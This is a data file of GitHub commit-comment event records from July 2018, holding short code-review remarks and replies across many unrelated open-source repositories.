{"id":"7919217540","type":"CommitCommentEvent","actor":{"login":"saladinjake"},"repo":{"name":"saladinjake/sprinttex"},"payload":{"comment":{"id":29597386,"position":null,"line":null,"path":null,"commit_id":"8805269b10637a3f040b57e9d3f0aa21c8e695f5","created_at":"2018-07-04T15:51:21Z","updated_at":"2018-07-04T15:51:21Z","author_association":"OWNER","body":"Next Task is to finish up design and switch to coding the node part using express js"}},"created_at":"2018-07-04T15:51:21Z"}
{"id":"7919221064","type":"CommitCommentEvent","actor":{"login":"freshprince"},"repo":{"name":"torhve/weechat-matrix-protocol-script"},"payload":{"comment":{"id":29597392,"position":null,"line":null,"path":null,"commit_id":"492061fba018fdba30883e0ca9afa6557e524830","created_at":"2018-07-04T15:52:11Z","updated_at":"2018-07-04T15:52:11Z","author_association":"CONTRIBUTOR","body":"I very often use `/buffer <buffername>` to switch between buffers and this doesn't work if the name has spaces.  If you commented this out because of cosmetic reasons only I humbly ask you to undo this."}},"created_at":"2018-07-04T15:52:11Z"}
{"id":"7919221069","type":"CommitCommentEvent","actor":{"login":"StevenLeighton21"},"repo":{"name":"elcorbs/tennis_kata"},"payload":{"comment":{"id":29597393,"position":46,"line":46,"path":"lib/tennis.rb","commit_id":"985c26e961b370b78edcf9cc175de354245dcf13","created_at":"2018-07-04T15:52:11Z","updated_at":"2018-07-04T15:52:11Z","author_association":"NONE","body":"suggest this could be `winner?` similar to `return_to_deuce?`"}},"created_at":"2018-07-04T15:52:11Z"}
{"id":"7919224022","type":"CommitCommentEvent","actor":{"login":"SebAshton"},"repo":{"name":"elcorbs/tennis_kata"},"payload":{"comment":{"id":29597401,"position":17,"line":17,"path":"lib/tennis.rb","commit_id":"985c26e961b370b78edcf9cc175de354245dcf13","created_at":"2018-07-04T15:52:53Z","updated_at":"2018-07-04T15:52:53Z","author_association":"NONE","body":"Whitespace here is a bit confusing, maybe its the number of `if/else`'s can we split this out into 2/3 other methods?"}},"created_at":"2018-07-04T15:52:53Z"}
{"id":"7919225306","type":"CommitCommentEvent","actor":{"login":"Varstahl"},"repo":{"name":"Sandmann79/xbmc"},"payload":{"comment":{"id":29597404,"position":13,"line":46,"path":"plugin.video.amazon/resources/lib/common.py","commit_id":"1386ecf9bf8d515114dce7947b327865bc052482","created_at":"2018-07-04T15:53:11Z","updated_at":"2018-07-04T15:53:11Z","author_association":"COLLABORATOR","body":"> service.py and default.py are completely different interpreter sessions / tasks,\r\n\r\nThat's not what I meant. What I meant is that, if we consider default.py, unless I'm mistaken the global `addon` is initialized once when the module is loaded, and a second time when the function `init_common()` is called, regardless of the order of execution. Am I wrong?"}},"created_at":"2018-07-04T15:53:11Z"}
{"id":"7919226347","type":"CommitCommentEvent","actor":{"login":"owocki"},"repo":{"name":"gitcoinco/web"},"payload":{"comment":{"id":29597405,"position":4,"line":25,"path":"app/assets/yge/css/main.css","commit_id":"50f63ec311bf288ff43447fdadb57441dfdc6387","created_at":"2018-07-04T15:53:27Z","updated_at":"2018-07-04T15:53:27Z","author_association":"MEMBER","body":"this makes it impossible to scroll down in the gitcoin.co/tip flow"}},"created_at":"2018-07-04T15:53:27Z"}
{"id":"7919227106","type":"CommitCommentEvent","actor":{"login":"kcopper8"},"repo":{"name":"kcopper8/english-study"},"payload":{"comment":{"id":29597406,"position":18,"line":18,"path":"A New Refined CollectionView for Marionette.js/text.md","commit_id":"27d4d89bbdad5f605adba6d5293356d5dfec1cca","created_at":"2018-07-04T15:53:37Z","updated_at":"2018-07-04T15:53:37Z","author_association":"OWNER","body":"위 문장에서 `along side` 라는 표현이 사용되었는데요, 사전에 `alongside` 라는 합성어는 검색되지만, 두 단어를 이어서 사용하는 예제는 좀처럼 검색되지 않았습니다. 작성자가 `alongside` 를 쓰려다 오타를 냈거나 `along the side` 에서 `the` 를 빠뜨린게 아닐까 추측합니다."}},"created_at":"2018-07-04T15:53:37Z"}
{"id":"7919227684","type":"CommitCommentEvent","actor":{"login":"cbacon93"},"repo":{"name":"cbacon93/palermo"},"payload":{"comment":{"id":29597407,"position":null,"line":null,"path":null,"commit_id":"504fcf64ec1f04c494ae4848adb39ed3f1b913c1","created_at":"2018-07-04T15:53:46Z","updated_at":"2018-07-04T15:53:46Z","author_association":"OWNER","body":"closes #9 "}},"created_at":"2018-07-04T15:53:46Z"}
{"id":"7919230188","type":"CommitCommentEvent","actor":{"login":"shay6"},"repo":{"name":"shay6/ansible-tower-sonar-deployment"},"payload":{"comment":{"id":29597415,"position":null,"line":null,"path":null,"commit_id":"c43f35b4e43bbcb30b84cc7d5e68e862fb6c0742","created_at":"2018-07-04T15:54:25Z","updated_at":"2018-07-04T15:54:25Z","author_association":"OWNER","body":"change postgresql_user to root"}},"created_at":"2018-07-04T15:54:25Z"}
{"id":"7919236385","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"classnum/mnemosyne"},"payload":{"comment":{"id":29597434,"position":null,"line":null,"path":null,"commit_id":"94763512422d5ae3083d4b437c072cb83193c2b8","created_at":"2018-07-04T15:55:52Z","updated_at":"2018-07-04T15:55:52Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/classnum/mnemosyne/4416)*\n"}},"created_at":"2018-07-04T15:55:52Z"}
{"id":"7919240113","type":"CommitCommentEvent","actor":{"login":"jeslg"},"repo":{"name":"jeslg/single-p"},"payload":{"comment":{"id":29597442,"position":null,"line":null,"path":null,"commit_id":"ea658fc16a07bc457d60d824bd980fd19b2c06ba","created_at":"2018-07-04T15:56:45Z","updated_at":"2018-07-04T15:56:45Z","author_association":"OWNER","body":"Dummy typeclass to avoid the family of `fromFields` instances.\r\n\\cc @jserranohidalgo"}},"created_at":"2018-07-04T15:56:45Z"}
{"id":"7919240123","type":"CommitCommentEvent","actor":{"login":"vladmihalcea"},"repo":{"name":"hibernate/hibernate-orm"},"payload":{"comment":{"id":29597443,"position":33,"line":163,"path":"hibernate-core/src/test/java/org/hibernate/jpa/test/lock/LockTest.java","commit_id":"6b3e4e6f56771dd2955a42a4830a44bd56899e70","created_at":"2018-07-04T15:56:45Z","updated_at":"2018-07-04T15:56:45Z","author_association":"MEMBER","body":"Yes, because the problem is not related to the Oracle Dialect implementation, but to the way the test logic expected Oracle to keep on working while getting a lock acquisition exception."}},"created_at":"2018-07-04T15:56:45Z"}
{"id":"7919243502","type":"CommitCommentEvent","actor":{"login":"owocki"},"repo":{"name":"gitcoinco/web"},"payload":{"comment":{"id":29597452,"position":4,"line":25,"path":"app/assets/yge/css/main.css","commit_id":"50f63ec311bf288ff43447fdadb57441dfdc6387","created_at":"2018-07-04T15:57:29Z","updated_at":"2018-07-04T15:57:29Z","author_association":"MEMBER","body":"6082a802224508af211ab44eaddd75c67d1fe640"}},"created_at":"2018-07-04T15:57:29Z"}
{"id":"7919243587","type":"CommitCommentEvent","actor":{"login":"xvortex"},"repo":{"name":"xvortex/ps4-hen-vtx"},"payload":{"comment":{"id":29597453,"position":null,"line":null,"path":null,"commit_id":"665793735c9b320ef6f3e3b5072e7c1c61a0b243","created_at":"2018-07-04T15:57:30Z","updated_at":"2018-07-04T15:57:30Z","author_association":"OWNER","body":"kudos to flatz for ShellCore offset"}},"created_at":"2018-07-04T15:57:30Z"}
{"id":"7919243677","type":"CommitCommentEvent","actor":{"login":"Jwata"},"repo":{"name":"Jwata/SushiDetectoriOS"},"payload":{"comment":{"id":29597454,"position":null,"line":null,"path":null,"commit_id":"23cac79041168012b84f2ae015134158854a3cf4","created_at":"2018-07-04T15:57:31Z","updated_at":"2018-07-04T15:57:31Z","author_association":"OWNER","body":"@japer21 \r\nThose model should work with the tensorflow 1.8, as long as you trained in the same version.\r\nThe model architectures you mentioned shouldn't matter."}},"created_at":"2018-07-04T15:57:31Z"}
{"id":"7919244156","type":"CommitCommentEvent","actor":{"login":"SaptakS"},"repo":{"name":"gitcoinco/web"},"payload":{"comment":{"id":29597455,"position":4,"line":25,"path":"app/assets/yge/css/main.css","commit_id":"50f63ec311bf288ff43447fdadb57441dfdc6387","created_at":"2018-07-04T15:57:37Z","updated_at":"2018-07-04T15:57:37Z","author_association":"CONTRIBUTOR","body":"@owocki the fix is [here](https://github.com/gitcoinco/web/pull/1618)"}},"created_at":"2018-07-04T15:57:37Z"}
{"id":"7919244369","type":"CommitCommentEvent","actor":{"login":"kcopper8"},"repo":{"name":"kcopper8/english-study"},"payload":{"comment":{"id":29597457,"position":30,"line":30,"path":"A New Refined CollectionView for Marionette.js/text.md","commit_id":"27d4d89bbdad5f605adba6d5293356d5dfec1cca","created_at":"2018-07-04T15:57:40Z","updated_at":"2018-07-04T15:57:40Z","author_association":"OWNER","body":"> in doing so it includes some breaking ... \r\n\r\n에서, `in doing so` 다음에 `,` 가 붙어야 하지 않을까 생각합니다.\r\n\r\n> in doing so, it includes some breaking\r\n\r\n이게 정확한 표현인가요?"}},"created_at":"2018-07-04T15:57:40Z"}
{"id":"7919244998","type":"CommitCommentEvent","actor":{"login":"thip"},"repo":{"name":"elcorbs/tennis_kata"},"payload":{"comment":{"id":29597459,"position":22,"line":22,"path":"lib/tennis.rb","commit_id":"985c26e961b370b78edcf9cc175de354245dcf13","created_at":"2018-07-04T15:57:49Z","updated_at":"2018-07-04T15:57:49Z","author_association":"NONE","body":"These scores look like prime candidates for symbols to me.  So instead of \"adv\", \"40\", \"30\" you could have :adv, :40, :30, etc...   -  it's not a huge change but I think it would make it more readable"}},"created_at":"2018-07-04T15:57:49Z"}
{"id":"7919253118","type":"CommitCommentEvent","actor":{"login":"thip"},"repo":{"name":"elcorbs/tennis_kata"},"payload":{"comment":{"id":29597478,"position":22,"line":22,"path":"lib/tennis.rb","commit_id":"985c26e961b370b78edcf9cc175de354245dcf13","created_at":"2018-07-04T15:59:38Z","updated_at":"2018-07-04T15:59:38Z","author_association":"NONE","body":"https://stackoverflow.com/questions/16621073/when-to-use-symbols-instead-of-strings-in-ruby\r\n"}},"created_at":"2018-07-04T15:59:38Z"}
{"id":"7919253492","type":"CommitCommentEvent","actor":{"login":"SaptakS"},"repo":{"name":"gitcoinco/web"},"payload":{"comment":{"id":29597479,"position":4,"line":25,"path":"app/assets/yge/css/main.css","commit_id":"50f63ec311bf288ff43447fdadb57441dfdc6387","created_at":"2018-07-04T15:59:43Z","updated_at":"2018-07-04T15:59:43Z","author_association":"CONTRIBUTOR","body":"@owocki the scroll needs to be on the wrapper class rather than on yge or body, because that causes an uneven scroll because of the rain animation in the background."}},"created_at":"2018-07-04T15:59:43Z"}
{"id":"7919256031","type":"CommitCommentEvent","actor":{"login":"japer21"},"repo":{"name":"Jwata/SushiDetectoriOS"},"payload":{"comment":{"id":29597488,"position":null,"line":null,"path":null,"commit_id":"23cac79041168012b84f2ae015134158854a3cf4","created_at":"2018-07-04T16:00:18Z","updated_at":"2018-07-04T16:00:18Z","author_association":"NONE","body":"Ok thank you very much.\nI hope I am doing the right steps :)\n\nOn Wed, Jul 4, 2018 at 5:57 PM, Junji Watanabe <notifications@github.com>\nwrote:\n\n> @japer21 <https://github.com/japer21>\n> Those model should work with the tensorflow 1.8, as long as you trained in\n> the same version.\n> The model architectures you mentioned shouldn't matter.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Jwata/SushiDetectoriOS/commit/23cac79041168012b84f2ae015134158854a3cf4#commitcomment-29597454>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARJZR7_rMwXzvEr4A9IJSNLJXrJzeYIbks5uDOXrgaJpZM4VCtQ_>\n> .\n>\n\n\n\n-- \nJaglika Perkova\n"}},"created_at":"2018-07-04T16:00:18Z"}
{"id":"7919257215","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597492,"position":41,"line":142,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:00:32Z","updated_at":"2018-07-04T16:00:32Z","author_association":"OWNER","body":"Maybe you can replace the bloc with:\r\nprice0 = args.price0 ? Number(args.price0) : 0;"}},"created_at":"2018-07-04T16:00:32Z"}
{"id":"7919257227","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29597493,"position":null,"line":null,"path":null,"commit_id":"fdb9cbef3f2433dec57ca461cff9e0d91b9efb03","created_at":"2018-07-04T16:00:33Z","updated_at":"2018-07-04T16:00:33Z","author_association":"OWNER","body":"commit fdb9cbe"}},"created_at":"2018-07-04T16:00:33Z"}
{"id":"7919258626","type":"CommitCommentEvent","actor":{"login":"victordomingos"},"repo":{"name":"victordomingos/Count-files"},"payload":{"comment":{"id":29597495,"position":null,"line":null,"path":null,"commit_id":"c9bbe3340a85e16c35873cfd39297882867a720e","created_at":"2018-07-04T16:00:52Z","updated_at":"2018-07-04T16:00:52Z","author_association":"OWNER","body":"Good idea. Can you please add it?"}},"created_at":"2018-07-04T16:00:52Z"}
{"id":"7919259476","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597498,"position":46,"line":147,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:01:04Z","updated_at":"2018-07-04T16:01:04Z","author_association":"OWNER","body":"Are price0 and price1 nice names for parameters? What do they mean?"}},"created_at":"2018-07-04T16:01:04Z"}
{"id":"7919260631","type":"CommitCommentEvent","actor":{"login":"RabsRincon"},"repo":{"name":"mattgodbolt/compiler-explorer"},"payload":{"comment":{"id":29597503,"position":8,"line":83,"path":"static/main.js","commit_id":"dd2ab6d41fbbdfe778f7e601d79e3e381bdbe3ef","created_at":"2018-07-04T16:01:20Z","updated_at":"2018-07-04T16:01:20Z","author_association":"COLLABORATOR","body":"Let me know what you think about this approach"}},"created_at":"2018-07-04T16:01:20Z"}
{"id":"7919262377","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29597508,"position":null,"line":null,"path":null,"commit_id":"43f64992f4b92bc31b1933eeb94ea1adcf0cf035","created_at":"2018-07-04T16:01:44Z","updated_at":"2018-07-04T16:01:44Z","author_association":"COLLABORATOR","body":"Puzzle `565-1108b582` disappeared from [`src/main/java/com/zerocracy/pmo/banks/FkBank.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/banks/FkBank.java), that's why I closed #1067. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-04T16:01:44Z"}
{"id":"7919262550","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29597509,"position":5,"line":2011,"path":"TFNetworkLayer.py","commit_id":"6baeceb508d0acc526a645abff3cade13c1bd3c0","created_at":"2018-07-04T16:01:47Z","updated_at":"2018-07-04T16:01:47Z","author_association":"MEMBER","body":"Maybe not `window_size=10` by default, but use `window_size=None`, and then `assert window_size is not None` when `window_start` is used. So enforce that this is set explicitly."}},"created_at":"2018-07-04T16:01:47Z"}
{"id":"7919262655","type":"CommitCommentEvent","actor":{"login":"RabsRincon"},"repo":{"name":"mattgodbolt/compiler-explorer"},"payload":{"comment":{"id":29597510,"position":45,"line":119,"path":"lib/utils.js","commit_id":"dd2ab6d41fbbdfe778f7e601d79e3e381bdbe3ef","created_at":"2018-07-04T16:01:48Z","updated_at":"2018-07-04T16:01:48Z","author_association":"COLLABORATOR","body":"Function gotten from base cache"}},"created_at":"2018-07-04T16:01:48Z"}
{"id":"7919262878","type":"CommitCommentEvent","actor":{"login":"sebastianst"},"repo":{"name":"sebastianst/ABY"},"payload":{"comment":{"id":29597511,"position":66,"line":417,"path":"src/abycore/sharing/arithsharing.cpp","commit_id":"1f285824e6cac3e06fc71e5b8e08ad3d425e5085","created_at":"2018-07-04T16:01:51Z","updated_at":"2018-07-04T16:01:51Z","author_association":"OWNER","body":"added note with f895353861a37d9cf0bb4fb2b32f7a2dc7634394"}},"created_at":"2018-07-04T16:01:51Z"}
{"id":"7919263934","type":"CommitCommentEvent","actor":{"login":"raphaelbadia"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29597517,"position":null,"line":null,"path":null,"commit_id":"b13879e619333525026d48364610456e10b1d67f","created_at":"2018-07-04T16:02:06Z","updated_at":"2018-07-04T16:02:06Z","author_association":"NONE","body":"Are you on windows ? Maybe your editor adds \\r\\n (known as CRLF) at the end of the line instead of a simple \\n (LF)"}},"created_at":"2018-07-04T16:02:06Z"}
{"id":"7919265721","type":"CommitCommentEvent","actor":{"login":"DOgnshiFc"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29597522,"position":null,"line":null,"path":null,"commit_id":"4f7447f08104706c537e4fd119dfa4a0afa3b799","created_at":"2018-07-04T16:02:31Z","updated_at":"2018-07-04T16:02:31Z","author_association":"NONE","body":"An error occurred in the script...\r\nwhy\r\nhellp!\r\n ---- Obfs setting\r\n -- local obfs_mode = false\r\n local obfs_mode = false\r\n local interval_ratio = 0.75\r\n local random_seed = 1\r\nXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX \r\n-local auto_reloading = true\r\n+local auto_reloading = false\r\n "}},"created_at":"2018-07-04T16:02:31Z"}
{"id":"7919266638","type":"CommitCommentEvent","actor":{"login":"warrenm"},"repo":{"name":"warrenm/imgui"},"payload":{"comment":{"id":29597524,"position":10,"line":10,"path":"examples/imgui_impl_osx.h","commit_id":"b8fb50e486490601dce84062d3071f849d7eaff1","created_at":"2018-07-04T16:02:45Z","updated_at":"2018-07-04T16:02:45Z","author_association":"OWNER","body":"Nope, looks like a copy-paste glitch."}},"created_at":"2018-07-04T16:02:45Z"}
{"id":"7919268602","type":"CommitCommentEvent","actor":{"login":"Akilesgos"},"repo":{"name":"Akilesgos/to-do-list"},"payload":{"comment":{"id":29597533,"position":null,"line":null,"path":null,"commit_id":"24707986539b824cba002302e6be48a6e741c6c3","created_at":"2018-07-04T16:03:14Z","updated_at":"2018-07-04T16:03:14Z","author_association":"OWNER","body":"Have done some edits to to-do-list"}},"created_at":"2018-07-04T16:03:14Z"}
{"id":"7919268655","type":"CommitCommentEvent","actor":{"login":"subdavis"},"repo":{"name":"subdavis/Tusk"},"payload":{"comment":{"id":29597534,"position":null,"line":null,"path":null,"commit_id":"243f1508d6b25803c24e37bacf6c3c2d3405f30d","created_at":"2018-07-04T16:03:15Z","updated_at":"2018-07-04T16:03:15Z","author_association":"OWNER","body":"No, this version doesn't work.  "}},"created_at":"2018-07-04T16:03:15Z"}
{"id":"7919269823","type":"CommitCommentEvent","actor":{"login":"vkarpov15"},"repo":{"name":"Automattic/mongoose"},"payload":{"comment":{"id":29597535,"position":null,"line":null,"path":null,"commit_id":"727eda48bcecfb8f4462162863e7beb7bca18fdb","created_at":"2018-07-04T16:03:33Z","updated_at":"2018-07-04T16:03:33Z","author_association":"COLLABORATOR","body":"@AndyOchoaS can you open up a separate issue with code samples please?"}},"created_at":"2018-07-04T16:03:33Z"}
{"id":"7919269952","type":"CommitCommentEvent","actor":{"login":"Nick-Nguyen"},"repo":{"name":"nicknguyenprojects/softmall"},"payload":{"comment":{"id":29597537,"position":null,"line":null,"path":null,"commit_id":"a24c8b01db59449db70cb4ff0fe26b0ca1f6aaab","created_at":"2018-07-04T16:03:35Z","updated_at":"2018-07-04T16:03:35Z","author_association":"CONTRIBUTOR","body":"ok"}},"created_at":"2018-07-04T16:03:35Z"}
{"id":"7919271683","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29597542,"position":null,"line":null,"path":null,"commit_id":"43dfd608fcb1d1f3e33a377168073e21b15a6f14","created_at":"2018-07-04T16:04:03Z","updated_at":"2018-07-04T16:04:03Z","author_association":"COLLABORATOR","body":"Well done!\r\n\r\nSee perhaps if you can write a new function in the database class, using `retrieveData` but called `retrieveOne` or something similar - which retrieves one item only, i.e. contains that loop in and returns the single value - so that the 'mechanics' of getting data from the database are in the database class instead of here."}},"created_at":"2018-07-04T16:04:03Z"}
{"id":"7919274986","type":"CommitCommentEvent","actor":{"login":"serhan07"},"repo":{"name":"AliShakir/Bootstrap-dynamic-slider-in-ASP.Net-and-SQL-Server-"},"payload":{"comment":{"id":29597548,"position":null,"line":null,"path":null,"commit_id":"e9e5bca8cd59020c915388aabdd4b1fdeefec100","created_at":"2018-07-04T16:04:53Z","updated_at":"2018-07-04T16:04:53Z","author_association":"NONE","body":"e9e5bca"}},"created_at":"2018-07-04T16:04:53Z"}
{"id":"7919275829","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597557,"position":18,"line":119,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:05:05Z","updated_at":"2018-07-04T16:05:05Z","author_association":"OWNER","body":"Move this to utils as utils__safeParse()"}},"created_at":"2018-07-04T16:05:05Z"}
{"id":"7919281129","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29597561,"position":null,"line":null,"path":null,"commit_id":"4e99bd87357e4248af996bd7441413be041c8413","created_at":"2018-07-04T16:06:20Z","updated_at":"2018-07-04T16:06:20Z","author_association":"COLLABORATOR","body":"I think you'll need to do\r\n\r\n`git rm .cycletheft.php.swp`\r\n\r\nto get rid of that legacy file that is stuck there. (As you probably guessed, `rm` is remove.)"}},"created_at":"2018-07-04T16:06:20Z"}
{"id":"7919287563","type":"CommitCommentEvent","actor":{"login":"Tomsanm"},"repo":{"name":"Tomsanm/DataStructureandAlgorithms"},"payload":{"comment":{"id":29597582,"position":null,"line":null,"path":null,"commit_id":"079fffbb016715b21f055ac20bd5101284f88538","created_at":"2018-07-04T16:07:56Z","updated_at":"2018-07-04T16:07:56Z","author_association":"OWNER","body":"具体思路：\r\n![default](https://user-images.githubusercontent.com/28773741/42287018-5e8db8dc-7fe7-11e8-9a62-4388644e65e1.png)\r\n"}},"created_at":"2018-07-04T16:07:56Z"}
{"id":"7919288363","type":"CommitCommentEvent","actor":{"login":"VishnuThamiz05"},"repo":{"name":"VishnuThamiz05/test"},"payload":{"comment":{"id":29597585,"position":null,"line":null,"path":null,"commit_id":"d2fb4d3f8e3a8c07d5f81906bb41e17a303c7b49","created_at":"2018-07-04T16:08:09Z","updated_at":"2018-07-04T16:08:09Z","author_association":"OWNER","body":"that was good"}},"created_at":"2018-07-04T16:08:09Z"}
{"id":"7919291597","type":"CommitCommentEvent","actor":{"login":"Shumaister"},"repo":{"name":"Shumaister/FrbaHotel"},"payload":{"comment":{"id":29597590,"position":null,"line":null,"path":null,"commit_id":"74810ddcf3742b544dfcc646179c9817976553f1","created_at":"2018-07-04T16:08:57Z","updated_at":"2018-07-04T16:08:57Z","author_association":"OWNER","body":"https://www.google.com.ar/search?q=maradona+levantando+la+copa&tbm=isch&source=iu&ictx=1&fir=MNjErMb-pYuWAM%253A%252C7Zzb6epDIHT9QM%252C_&usg=__ShVcLrGXMwo0YS2BbRNEG4w1ujQ%3D&sa=X&ved=0ahUKEwj1xNqq6oXcAhXJg5AKHZXmARoQ9QEIKTAA#imgrc=MNjErMb-pYuWAM:"}},"created_at":"2018-07-04T16:08:57Z"}
{"id":"7919294869","type":"CommitCommentEvent","actor":{"login":"alexhartley"},"repo":{"name":"kaneinternational/manual-KANE458"},"payload":{"comment":{"id":29597600,"position":6,"line":8,"path":"sections/analyser-layout-features.md","commit_id":"b67de7c7063a4fcd6c79b79a74d6c1ed84e94eb5","created_at":"2018-07-04T16:09:48Z","updated_at":"2018-07-04T16:09:48Z","author_association":"MEMBER","body":"THis lines not right"}},"created_at":"2018-07-04T16:09:48Z"}
{"id":"7919295286","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597601,"position":116,"line":217,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:09:55Z","updated_at":"2018-07-04T16:09:55Z","author_association":"OWNER","body":"Can it be a decimal number?"}},"created_at":"2018-07-04T16:09:55Z"}
{"id":"7919295422","type":"CommitCommentEvent","actor":{"login":"DoccyB"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29597603,"position":null,"line":null,"path":null,"commit_id":"43dfd608fcb1d1f3e33a377168073e21b15a6f14","created_at":"2018-07-04T16:09:57Z","updated_at":"2018-07-04T16:09:57Z","author_association":"OWNER","body":"Okay doke! And it's okay for now to just create a new instance of a class\nevery time i need it in a function?\n\nOn 4 July 2018 at 17:04, Martin <notifications@github.com> wrote:\n\n> Well done!\n>\n> See perhaps if you can write a new function in the database class, using\n> retrieveData but called retrieveOne or something similar - which\n> retrieves one item only, i.e. contains that loop in and returns the single\n> value - so that the 'mechanics' of getting data from the database are in\n> the database class instead of here.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DoccyB/cycledata/commit/43dfd608fcb1d1f3e33a377168073e21b15a6f14#commitcomment-29597542>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AXIQ3JGVSa97Fwew91m3G27NxPh2kDO1ks5uDOdzgaJpZM4VCzim>\n> .\n>\n"}},"created_at":"2018-07-04T16:09:57Z"}
{"id":"7919298926","type":"CommitCommentEvent","actor":{"login":"benfrancis"},"repo":{"name":"mozilla-iot/webthing-node"},"payload":{"comment":{"id":29597605,"position":15,"line":27,"path":"lib/thing.js","commit_id":"82d5266393fac2eedc6f44356ae0868b8640a166","created_at":"2018-07-04T16:10:51Z","updated_at":"2018-07-04T16:10:51Z","author_association":"NONE","body":"Plans, yes, but it may take a while. The important thing is that the context has a URL, not that that URL resolves to anything. But we do plan to turn that URL into a live repository you can browse on the web, (currently empty) GitHub repository here https://github.com/mozilla-iot/schemas"}},"created_at":"2018-07-04T16:10:51Z"}
{"id":"7919300446","type":"CommitCommentEvent","actor":{"login":"sebastianst"},"repo":{"name":"sebastianst/ABY"},"payload":{"comment":{"id":29597607,"position":null,"line":null,"path":null,"commit_id":"00e8ffd9af0f93028029aedbe9b42a068c08b279","created_at":"2018-07-04T16:11:16Z","updated_at":"2018-07-04T16:11:16Z","author_association":"OWNER","body":"removed with 9b3517df405843c91de54663b7a326ab77eca23b"}},"created_at":"2018-07-04T16:11:16Z"}
{"id":"7919300557","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29597608,"position":13,"line":31,"path":"code/Language/Drasil/Chunk/Eq.hs","commit_id":"b032040f259db486b4b1e988784879bb81cb9d00","created_at":"2018-07-04T16:11:18Z","updated_at":"2018-07-04T16:11:18Z","author_association":"OWNER","body":"Meaning that there are things which are explicitly 'implemented' via `QDefinition` that have missing information?"}},"created_at":"2018-07-04T16:11:18Z"}
{"id":"7919301298","type":"CommitCommentEvent","actor":{"login":"cwickert"},"repo":{"name":"SUSE/doc-caasp"},"payload":{"comment":{"id":29597610,"position":null,"line":null,"path":null,"commit_id":"28ec8cdcec18a0f093bb98a80190025e2106bcb4","created_at":"2018-07-04T16:11:29Z","updated_at":"2018-07-04T16:11:29Z","author_association":"MEMBER","body":"Actually we could remove the emphasis."}},"created_at":"2018-07-04T16:11:29Z"}
{"id":"7919304191","type":"CommitCommentEvent","actor":{"login":"r0ckarong"},"repo":{"name":"SUSE/doc-caasp"},"payload":{"comment":{"id":29597620,"position":null,"line":null,"path":null,"commit_id":"28ec8cdcec18a0f093bb98a80190025e2106bcb4","created_at":"2018-07-04T16:12:14Z","updated_at":"2018-07-04T16:12:14Z","author_association":"CONTRIBUTOR","body":"Yeah, agreed on all points."}},"created_at":"2018-07-04T16:12:14Z"}
{"id":"7919304366","type":"CommitCommentEvent","actor":{"login":"intellstone"},"repo":{"name":"intellstone/TIL"},"payload":{"comment":{"id":29597621,"position":11,"line":8,"path":"README.md","commit_id":"f245c3f7fac9de598cd1aca5e72074ee29c64e6e","created_at":"2018-07-04T16:12:17Z","updated_at":"2018-07-04T16:12:17Z","author_association":"OWNER","body":"오늘은 커밋안하셔도 돼요\r\n쉬는 날이니까"}},"created_at":"2018-07-04T16:12:17Z"}
{"id":"7919307851","type":"CommitCommentEvent","actor":{"login":"Majkl578"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29597627,"position":null,"line":null,"path":null,"commit_id":"d84ef967424343abcc48b8f945d5e7807f1c1e09","created_at":"2018-07-04T16:13:11Z","updated_at":"2018-07-04T16:13:11Z","author_association":"CONTRIBUTOR","body":"Alright, it should still be noted in UPGRADING imho as a potential BC break."}},"created_at":"2018-07-04T16:13:11Z"}
{"id":"7919308244","type":"CommitCommentEvent","actor":{"login":"intellstone"},"repo":{"name":"intellstone/TIL"},"payload":{"comment":{"id":29597629,"position":11,"line":8,"path":"README.md","commit_id":"f245c3f7fac9de598cd1aca5e72074ee29c64e6e","created_at":"2018-07-04T16:13:16Z","updated_at":"2018-07-04T16:13:16Z","author_association":"OWNER","body":"아뇨 공부해야죠..."}},"created_at":"2018-07-04T16:13:16Z"}
